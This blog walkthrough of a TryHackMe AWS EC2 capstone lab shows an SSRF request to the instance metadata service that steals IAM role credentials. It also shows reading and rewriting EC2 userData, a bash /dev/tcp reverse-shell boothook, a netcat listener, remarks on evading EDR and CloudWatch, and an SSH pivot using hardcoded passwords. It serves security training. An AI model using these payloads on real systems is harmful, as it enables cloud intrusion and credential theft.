<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>TryHackMe AWS EC2 Walkthrough | halcyondream</title>
<meta name="generator" content="Jekyll v3.9.3" />
<meta property="og:title" content="TryHackMe AWS EC2 Walkthrough" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="THM EC2 Capstone Walkthrough" />
<meta property="og:description" content="THM EC2 Capstone Walkthrough" />
<link rel="canonical" href="http://localhost:4000/2024/02/18/thm-ec2-walkthrough.html" />
<meta property="og:url" content="http://localhost:4000/2024/02/18/thm-ec2-walkthrough.html" />
<meta property="og:site_name" content="halcyondream" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-02-18T00:00:00-05:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="TryHackMe AWS EC2 Walkthrough" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2024-02-18T00:00:00-05:00","datePublished":"2024-02-18T00:00:00-05:00","description":"THM EC2 Capstone Walkthrough","headline":"TryHackMe AWS EC2 Walkthrough","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2024/02/18/thm-ec2-walkthrough.html"},"url":"http://localhost:4000/2024/02/18/thm-ec2-walkthrough.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="halcyondream" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">halcyondream</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">TryHackMe AWS EC2 Walkthrough</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2024-02-18T00:00:00-05:00" itemprop="datePublished">Feb 18, 2024
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <h1 id="thm-ec2-capstone-walkthrough">THM EC2 Capstone Walkthrough</h1>

<p>As backdrop, the THM lab provides you with a set of long-term AWS keys (Access ID and Secret Key). We could speculate how these are retrieved in a real-world pentest: social engineering, successful phishing, or secrets leaking. Regardless, IAM credentials are the springboard for many successful AWS attacks, so the hard part is done.</p>

<p>Next, we find out that, via threat intelligence, a Server-Side Request Forgery (SSRF) vulnerability exists in an EC2-hosted application, which is available via a public-facing load balancer. The SSRF vulnerability can give an attacker the opportunity to infiltrate a private subnet. All of this is within the same VPC, but the private subnet that hosts the internal EC2 instance is available to anyone within that VPC.</p>

<p>Let’s start by enumerating all load balancers within our account:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ aws elbv2 describe-load-balancers
</code></pre></div></div>

<p>The <em>DNSName</em> field will give us the public URL. Use <em>nslookup</em> to get the IP and its host:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ nslookup initial-ssrf-vector-1523602582.us-east-1.elb.amazonaws.com
...
Address: 174.129.20.233
...

~$ nslookup 174.129.20.233
...
Non-authoritative answer:
233.20.129.174.in-addr.arpa	name = ec2-174-129-20-233.compute-1.amazonaws.com.
</code></pre></div></div>

<p>The <em>ec2-</em> in the second answer indicates that this is, in fact, an EC2 instance. Open it in a browser, or via <em>curl</em>. Interestingly, the response payload is just the phrase, “Hello Nurse”.</p>

<p>Although it’s not noted in the briefing, the THM walkthrough does provide a valid webpage: <em>/ssrf.php</em>, which loads the vulnerable application component. The <em>IP</em> text entry field requires, oddly, a web URI or URL. The application will make a request to that URI and display the response payload at the very top of the page.</p>

<p>Enter a URL, like <em>google.com</em>, and click <strong>Submit Query</strong>. The response body appears at the top of the page. Note that if you forget to specify the <em>https://</em> protocol, then a 301 message may display instead; this simply indicates an HTTP-to-HTTPS redirect and is trivial for this guide.</p>

<p>Now, inspect the navigation bar for the current page. The URL you specified is in the query parameter, <em>r</em>. If you specified <em>google.com</em>, then the request URL is:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://initial-ssrf-vector-1523602582.us-east-1.elb.amazonaws.com/ssrf.php?r=google.com#
</code></pre></div></div>

<p>Before going much farther, it’s worth taking a look at the source code for this feature, which is displayed in the <em>ssrf.php</em> webpage:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
    <span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'r'</span><span class="p">]))</span> <span class="p">{</span>
        <span class="nv">$ch</span> <span class="o">=</span> <span class="nb">curl_init</span><span class="p">();</span>
        <span class="nb">curl_setopt</span><span class="p">(</span><span class="nv">$ch</span><span class="p">,</span> <span class="no">CURLOPT_URL</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'r'</span><span class="p">]);</span>
        <span class="nb">curl_setopt</span><span class="p">(</span><span class="nv">$ch</span><span class="p">,</span> <span class="no">CURLOPT_HEADER</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
        <span class="nb">curl_exec</span><span class="p">(</span><span class="nv">$ch</span><span class="p">);</span>
        <span class="nb">curl_close</span><span class="p">(</span><span class="nv">$ch</span><span class="p">);</span>
    <span class="p">}</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>The source code snippet seems to indicate that the application is leveraging the <a href="https://www.php.net/manual/en/book.curl.php">PHP <em>curl</em> library</a> to make the request to your chosen URL. A few things to note here:</p>

<ul>
  <li>The <em>curl</em> logic is initiated so long as the query parameter <em>r</em> exists.</li>
  <li>The first <em>curl_setopt</em> function call will unconditionally set whatever URL you sent. No input validation on the URL is performed.</li>
  <li>The <em>curl_exec</em> command will make the request to the unvalidated URL.</li>
</ul>

<p>There exists no logic to enforce an allowed list of IPs, URLs, domains, and so forth. So, the <em>curl</em> invocation will request any URL you gave it, and return the logic as-is.</p>

<p>Since we know this is within the same VPC as the internal EC2 instance, we can try to leverage the Instance Metadata Service (IMDS). This will allow us to make simple requests with a URL string and, depending on the configuration, retrieve information about the EC2 instance with which we are working. It’s worth noting that there are currently two versions: IMDSv2 (preferred) and IMDSv1 (legacy).</p>

<p>Here are some key points from an attacker’s point of view:</p>

<ul>
  <li>The IMDS, regardless of its version, is <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html">always located at 169.254.169.254</a>.</li>
  <li>Metadata for both versions can be retrieved from <em>169.254.169.254/latest/meta-data</em>.</li>
  <li>Both versions have <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html">metadata categories</a>, which represent access points to get key information, and are simply appended to the <em>/latest/meta-data</em> path in the URL.</li>
  <li><a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html#imds-considerations">IMDSv2 requires the use of tokens for authorization</a>, whereas IMDSv1 performs <em>no authorization checks</em>.</li>
</ul>

<p>So, if we use the vulnerable <em>ssrf.php</em> to make a request to an instance metadata endpoint, we should be able to get back some information about the instance itself. Send a request with the following URL path:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/ssrf.php?r=169.254.169.254/latest/meta-data
</code></pre></div></div>

<p><em>Note: The full URL, with encoding, would look like so:</em></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://initial-ssrf-vector-1523602582.us-east-1.elb.amazonaws.com/ssrf.php?r=169.254.169.254%2Flatest%2Fmeta-data#
</code></pre></div></div>

<p>The response displays at the top of the page:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ami-id
...
iam/
...
system
</code></pre></div></div>

<p>Note that this list matches up with the metadata categories. The presence of the <em>iam/</em> directory is interesting. Since we know that many AWS attacks begin by exploiting weaknesses or misconfigurations in this service, let’s try to push this.</p>

<p>Open the documentation for all metadata categories and search for IAM ones. Note the <em>iam/security-credentials</em> metadata category. The documentation notes that <em>role-name</em> is optional, so the following two forms are valid:</p>

<ul>
  <li><em>iam/security-credentials</em></li>
  <li><em>iam/security-credentials/role-name</em></li>
</ul>

<p>However, these two forms will retrieve different information. Here’s what the documentation says about this category:</p>

<blockquote>
  <p>If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role… Otherwise, (role-name is) not present.</p>
</blockquote>

<p>So, if we can get the role name, we can add the role name itself to the end of the path and effectively get temporary security credentials. This would allow us to impersonate the EC2 instance to some capacity. The question is: what <em>is</em> the name of the role?</p>

<p>Before going to far in, recall a couple of things:</p>

<ul>
  <li>The <em>/latest/meta-data</em> path listed files and directories.</li>
  <li>The <em>iam/security-credentials</em> path is valid, even if it proves useless.</li>
</ul>

<p>So… what happens if we just target <em>/latest/meta-data/iam/security-credentials</em>, like so:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/ssrf.php?r=169.254.169.254/latest/meta-data/iam/security-credentials
</code></pre></div></div>

<p>Send this request. As it turns out, we get a bit of information:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>StarStarWAFRole
</code></pre></div></div>

<p>We can test if this is a valid role name by using this in the form, <em>iam/security-credentials/StarStarWAFRole</em>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/ssrf.php?r=169.254.169.254/latest/meta-data/iam/security-credentials/StarStarWAFRole
</code></pre></div></div>

<p>This does, in fact, return temporary credentials:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
  "Code" : "Success",
  "LastUpdated" : "2024-01-21T02:42:34Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA...",
  "SecretAccessKey" : "...",
  "Token" : "...",
  "Expiration" : "2024-01-21T09:08:26Z"
}
</code></pre></div></div>

<p>Take note of the <em>AccessKeyId</em>, <em>SecretAccessKey</em>, and <em>Token</em>. The Access Key ID stars with the string “ASIA,” which confirms that this is a set of temporary credentials. In our workstation, we can “steal” this identity with <em>aws configure</em>. We’ll call this profile <em>ec2-stolen</em>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ aws configure --profile ec2-stolen
AWS Access Key ID: ASIA...
AWS Secret Access Key: Ii+ENMOCljICwUF8N15Nf+6lnv/AF0ZfWrlZ97k5
# Use the default region and output format...
</code></pre></div></div>

<p>Use one more command to set the access token, replacing <code class="language-plaintext highlighter-rouge">&lt;Token&gt;</code> with the long token value from the leaked credentials:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ aws configure --profile ec2-stolen set aws_access_token &lt;Token&gt;
</code></pre></div></div>

<p>Confirm your identity by comparing the original caller-identity information with that of the stolen credentials’ identity:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ aws sts get-caller-identity 
{
    "UserId": "AIDA...",
    "Account": "...",
    "Arn": "arn:aws:iam::&lt;UserId&gt;:user/&lt;UserId&gt;"
}
~$ aws sts get-caller-identity --profile ec2-stolen
{
    "UserId": "AROA...",
    "Account": "...",
    "Arn": "arn:aws:sts::&lt;UserId&gt;:assumed-role/StarStarWAFRole/i-02c65bd50a06ee546"
}
</code></pre></div></div>

<p>Use the stolen credentials to describe EC2 instances associated with this role:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ aws ec2 describe-instances --profile ec2-stolen
</code></pre></div></div>

<p>From the output JSON, note the following fields:</p>

<ul>
  <li><em>Tags</em>. The <em>Name</em> tag’s <em>Value</em> is, hopefully, a meaningful name for the instance.</li>
  <li><em>InstanceId</em>. Used in subsequent EC2 API calls or the AWS CLI.</li>
  <li><em>InstanceType</em>. Tells you what type of instance this is. Useful if you need to restart the instance.</li>
  <li><em>PublicIpAddress</em>. If <em>None</em>, there is no way to directly access this instance from the web.</li>
  <li><em>PrivateIpAddress</em>. Allows you to move laterally, to other instances, throughout the VPC.</li>
</ul>

<p><em>Note: you can write a query in the AWS CLI to view these fields only for each instance.</em></p>

<p>In this case, discovery returns the following instance names:</p>

<ul>
  <li><em>ApplicationInstance</em>. Presumably, this runs the web application that contains <em>ssrf.php</em>. If we gain access to the system, we will want its private IP to confirm that we are in the right place.</li>
  <li><em>SecretInstance</em>. Presumably, this is <strong>Instance B</strong> within the private subnet. We will want to note its private IP so that, if we gain initial access to the Application instance, we can move laterally to this one.</li>
</ul>

<p>Let’s analyze each instance a bit further. The <a href="https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstanceAttribute.html"><em>ec2:DescribeImageAttribute</em></a> API specification lists several attributes that are fair game for further analysis. For the purpose of system access, the most interesting one is the <em>userData</em> attribute.</p>

<p>The instance <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html">User Data</a> defines automated actions, including startup commands or scripts. If we can access these, it may tell us key information about what each instance is doing, and may provide some hints for entry. If we can <em>modify</em> these, then we can try to leverage both initial access and persistence into the environment.</p>

<p>First, let’s see what each one is currently doing by retrieving the user data itself. The THM guide proposes a series of Bash commands which, during an engagement, you’re more likely to use. The following Python code, which leverages the <a href="https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html"><em>boto3</em> library</a> does the same thing:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">boto3</span>
<span class="kn">import</span> <span class="nn">botocore.config</span>
<span class="kn">import</span> <span class="nn">base64</span>


<span class="k">class</span> <span class="nc">Instance</span><span class="p">:</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">instance_name</span><span class="p">,</span> <span class="n">instance_id</span><span class="p">,</span> <span class="n">user_data</span><span class="p">,</span> <span class="n">private_ip</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">instance_name</span>
        <span class="bp">self</span><span class="p">.</span><span class="nb">id</span> <span class="o">=</span> <span class="n">instance_id</span> 
        <span class="bp">self</span><span class="p">.</span><span class="n">user_data</span> <span class="o">=</span> <span class="n">user_data</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">private_ip</span> <span class="o">=</span> <span class="n">private_ip</span>


<span class="k">def</span> <span class="nf">get_instance_name_from_tags</span><span class="p">(</span><span class="n">tags_list</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">tag</span> <span class="ow">in</span> <span class="n">tags_list</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">tag</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"Key"</span><span class="p">)</span> <span class="o">==</span> <span class="s">"Name"</span><span class="p">:</span>
            <span class="k">return</span> <span class="n">tag</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"Value"</span><span class="p">)</span>
    <span class="k">return</span> <span class="bp">None</span>


<span class="k">def</span> <span class="nf">get_instance_info</span><span class="p">(</span><span class="n">ec2_client</span><span class="p">):</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">ec2_client</span><span class="p">.</span><span class="n">describe_instances</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">reservation</span> <span class="ow">in</span> <span class="n">response</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"Reservations"</span><span class="p">):</span>
        <span class="k">for</span> <span class="n">instance</span> <span class="ow">in</span> <span class="n">reservation</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"Instances"</span><span class="p">):</span>
            <span class="nb">id</span> <span class="o">=</span> <span class="n">instance</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"InstanceId"</span><span class="p">)</span>
            <span class="n">name</span> <span class="o">=</span> <span class="n">get_instance_name_from_tags</span><span class="p">(</span><span class="n">instance</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"Tags"</span><span class="p">))</span>
            <span class="n">private_ip</span> <span class="o">=</span> <span class="n">instance</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"PrivateIpAddress"</span><span class="p">)</span>
            <span class="k">yield</span> <span class="p">(</span><span class="nb">id</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">private_ip</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">get_user_data</span><span class="p">(</span><span class="n">ec2_client</span><span class="p">):</span>
    <span class="k">for</span> <span class="nb">id</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">priv_ip</span> <span class="ow">in</span> <span class="n">get_instance_info</span><span class="p">(</span><span class="n">ec2_client</span><span class="p">):</span>
        <span class="n">response</span> <span class="o">=</span> <span class="n">ec2_client</span><span class="p">.</span><span class="n">describe_instance_attribute</span><span class="p">(</span>
            <span class="n">Attribute</span><span class="o">=</span><span class="s">"userData"</span><span class="p">,</span> <span class="n">InstanceId</span><span class="o">=</span><span class="nb">id</span>
        <span class="p">)</span>
        <span class="n">user_data_b64</span> <span class="o">=</span> <span class="n">response</span><span class="p">[</span><span class="s">"UserData"</span><span class="p">][</span><span class="s">"Value"</span><span class="p">]</span>
        <span class="n">user_data</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">user_data_b64</span><span class="p">).</span><span class="n">decode</span><span class="p">(</span><span class="s">"utf-8"</span><span class="p">)</span>
        <span class="k">yield</span> <span class="n">Instance</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="nb">id</span><span class="p">,</span> <span class="n">user_data</span><span class="p">,</span> <span class="n">priv_ip</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">process_user_data</span><span class="p">(</span><span class="n">ec2_client</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">instance</span> <span class="ow">in</span> <span class="n">get_user_data</span><span class="p">(</span><span class="n">ec2_client</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span>
            <span class="sa">f</span><span class="s">"</span><span class="se">\n</span><span class="si">{</span><span class="n">instance</span><span class="p">.</span><span class="nb">id</span><span class="si">}</span><span class="s"> </span><span class="si">{</span><span class="n">instance</span><span class="p">.</span><span class="n">name</span><span class="si">}</span><span class="s"> </span><span class="si">{</span><span class="n">instance</span><span class="p">.</span><span class="n">private_ip</span><span class="si">}</span><span class="se">\n</span><span class="s">---"</span> <span class="o">+</span>
            <span class="sa">f</span><span class="s">"</span><span class="si">{</span><span class="n">instance</span><span class="p">.</span><span class="n">user_data</span><span class="si">}</span><span class="s">"</span>
        <span class="p">)</span>
        <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="sa">f</span><span class="s">"</span><span class="si">{</span><span class="n">instance</span><span class="p">.</span><span class="nb">id</span><span class="si">}</span><span class="s">-</span><span class="si">{</span><span class="n">instance</span><span class="p">.</span><span class="n">name</span><span class="si">}</span><span class="s">-userdata.txt"</span><span class="p">,</span> <span class="s">"w+"</span><span class="p">)</span> <span class="k">as</span> <span class="nb">file</span><span class="p">:</span>
            <span class="nb">file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">instance</span><span class="p">.</span><span class="n">user_data</span><span class="p">)</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">config</span> <span class="o">=</span> <span class="n">botocore</span><span class="p">.</span><span class="n">config</span><span class="p">.</span><span class="n">Config</span><span class="p">(</span><span class="n">region_name</span><span class="o">=</span><span class="s">"us-east-1"</span><span class="p">)</span>
    <span class="n">session</span> <span class="o">=</span> <span class="n">boto3</span><span class="p">.</span><span class="n">Session</span><span class="p">(</span><span class="n">profile_name</span><span class="o">=</span><span class="s">"default"</span><span class="p">)</span>
    <span class="n">ec2_client</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="n">client</span><span class="p">(</span><span class="s">"ec2"</span><span class="p">)</span>
    <span class="n">process_user_data</span><span class="p">(</span><span class="n">ec2_client</span><span class="p">)</span>

</code></pre></div></div>

<p>This should print and list the each instance’s ID, name, and user data, along with writing all of that to their own files. It’s a bit overkill for a task and challenge of this scale. Still, it gives us something to analyze.</p>

<p>Key observations from the user data content:</p>

<ul>
  <li><em>ApplicationInstance</em>. This is a simple Bash script. The <em>yum</em> package manager is used to install some applications. Among those is <a href="https://github.com/jorgebastida/awslogs"><em>awslogs</em></a>, which connects to <a href="https://aws.amazon.com/cloudwatch/">AWS CloudWatch</a>. This means that our activity in the instance could be monitored by an Incident Response team. Since configuration is handled in this script, if we can modify or overwrite the contents, then we may be able to evade defenses to some capacity. This is trivial here but may prove valuable in a real-life pentest, where SOC teams might find you and shut you out.</li>
  <li><em>SecretDataInstance</em>. This is an AWS <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html#user-data-cloud-init"><em>cloud-init</em></a> file. Two key takeaways. First, the <em>ssh_pwauth</em> is set to <em>True</em>, which would enable a user to enter the instance without asymmetric keys. Even better, the <em>chpasswd</em> section includes the username and password needed to SSH into the instance. Likely, the developers implemented this weak configuration with hardcoded secrets because, they believed, the private cloud was impenetrable from the public internet. Time to prove them wrong.</li>
</ul>

<p>The easiest way to gain initial access is to modify or replace one of these scripts. An easy way to do this is with a reverse shell. There are several ways to accomplish this, so we should cover the pros and cons:</p>

<ul>
  <li>
    <p>The THM guide proposes using <em>yum</em> to install <em>nc</em>, then invoke <em>nc</em> to create the reverse shell. This is probably the “easiest” way to do this and is easier when systems ship with Netcat preinstalled. Unfortunately, a ton of EDR configurations will detect if <em>nc</em> or <em>netcat</em> are invoked, so this may not be the best way to catch this.</p>
  </li>
  <li>
    <p>Another approach is to use <a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#bash-tcp">Bash itself to create the TCP connection</a>. The command uses <a href="https://unix.stackexchange.com/a/241177">port redirections</a> and doesn’t leverage <em>nc</em> or any other binary; and, because it’s running raw Bash, it may stand out <em>way</em> less than a well-known command that’s easy to detect based on its filename and signature. The con is that you definitely need a Unix-like system running Bash version 2.0.4 or above. In addition, it can prove challenging to pull off and debug this kind of “remote shell-fu,” so tread lightly in real-world situations.</p>
  </li>
</ul>

<p>Let’s try out the native Bash approach. Take care to use the AttackBox and use its public IP. We can write a Bash boot-hook with the following contents:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#cloud-boothook
#!/bin/bash -x
bash -i &gt;&amp; /dev/tcp/&lt;AttackBoxPublicIP&gt;/4444 0&gt;&amp;1
</code></pre></div></div>

<p>Remember to replace <code class="language-plaintext highlighter-rouge">&lt;AttackBoxPublicIp&gt;</code> with your machine’s public IP address. Also note that this payload will target port 4444. If needed or desired, you can replace this with another port, but remember to use the same one for the listener.</p>

<p>Save it as <em>reverse-shell-native.txt</em>. Next, base64-encode the file. Since OpenSSL is available on <em>many</em> platforms, we can use that to encode its contents:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ openssl base64 -in reverse-shell-native.txt -out reverse-shell-native.enc
</code></pre></div></div>

<p>In addition, go ahead and start the listener in the AttackBox shell:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ nc -lvp 4444
</code></pre></div></div>

<p>Now, we need to upload the contents to one of the instances. From trial-and-error, I can confirm that a rever shell connection will fail if coming from the <em>SecretDataInstance</em>. There’s lots of reasons why reverse shells might fail—for example, firewall rules or EDR software—but you should never make assumptions. If this had worked, we would have circumvented the Application instance altogether.</p>

<p>Instead, we can defer to the attack workflow provided in the lab briefing: setting up the reverse shell from the <em>ApplicationInstance</em>, and from there, using a password-based <em>ssh</em> to the <em>SecretDataInstance</em>.</p>

<p>First, revert the original <em>userData</em> on the secret instance. Ensure that the AttackBox is running the Netcat listener. Then, stop the <em>ApplicationInstance</em>, update the <em>userData</em> attribute with the same ASCII-encoded reverse shell payload, and start the instance again, using the <em>ApplicationInstance</em> ID.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ aws ec2 start-instances \
    --instance-id i-... \
    --profile ec2-stolen
    # Wait...

~$ aws ec2 modify-instance-attribute \
    --profile ec2-stolen \
    --instance-id i-... \
    --attribute userData \
    --value file://reverse-shell-native.enc
    # Note: If successful, nothing will print.

~$ aws ec2 start-instances \
    --instance-id i-... \
    --profile ec2-stolen
    # Wait a little longer...
</code></pre></div></div>

<p>Note that stopping and starting can both take a few minutes, so grab a cup of coffee. You can check on the status with the <em>ec2:DescribeInstanceStatus</em> API call:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ aws ec2 describe-instance-status \
    --profile ec2-stolen 
    --instance-ids i-...
</code></pre></div></div>

<p>In any case, once successful, the <em>nc</em> listener will receive the connection. You are now connected to the <em>ApplicationInstance</em> box. The next step is to use <em>ssh</em> to pivot into the <em>SecretDataInstance</em>.</p>

<p>At this point, I would strongly recommend running <code class="language-plaintext highlighter-rouge">bash -i</code> or run <code class="language-plaintext highlighter-rouge">python -c 'import pty; pty.spawn("/bin/bash")'</code>. If not, you won’t see the SSH prompts, and this may interfere with the login process.</p>

<p>Once you’re ready, use:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ ssh &lt;User&gt;@&lt;PrivateIp&gt;
</code></pre></div></div>

<p>Where:</p>

<ul>
  <li><em>User</em> is the username you exfiltrated from the Secret instance’s <em>userData</em> configuration</li>
  <li><em>PrivateIp</em> is the Secret instance’s <em>PrivateIpAddress</em> we got earlier</li>
</ul>

<p>Once it prompts you for the password, use the password exfiltrated from the <em>userData</em>. At this point, you can run some familiar Linux commands to dump the contents of the secret.</p>

<p>As a final note, the <em>nc</em> package is preinstalled on the Secret instance. You can use it to try and manually initiate a reverse shell outside of the NAT and try to get a connection from a public workstation or the THM AttackBox. I didn’t have much success there, but it may be worth exploring further if you have the time.</p>

  </div><a class="u-url" href="/2024/02/18/thm-ec2-walkthrough.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">halcyondream</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">halcyondream</li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/halcyondream"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">halcyondream</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>Portfolio for Cybersecurity projects, research, and developments.</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
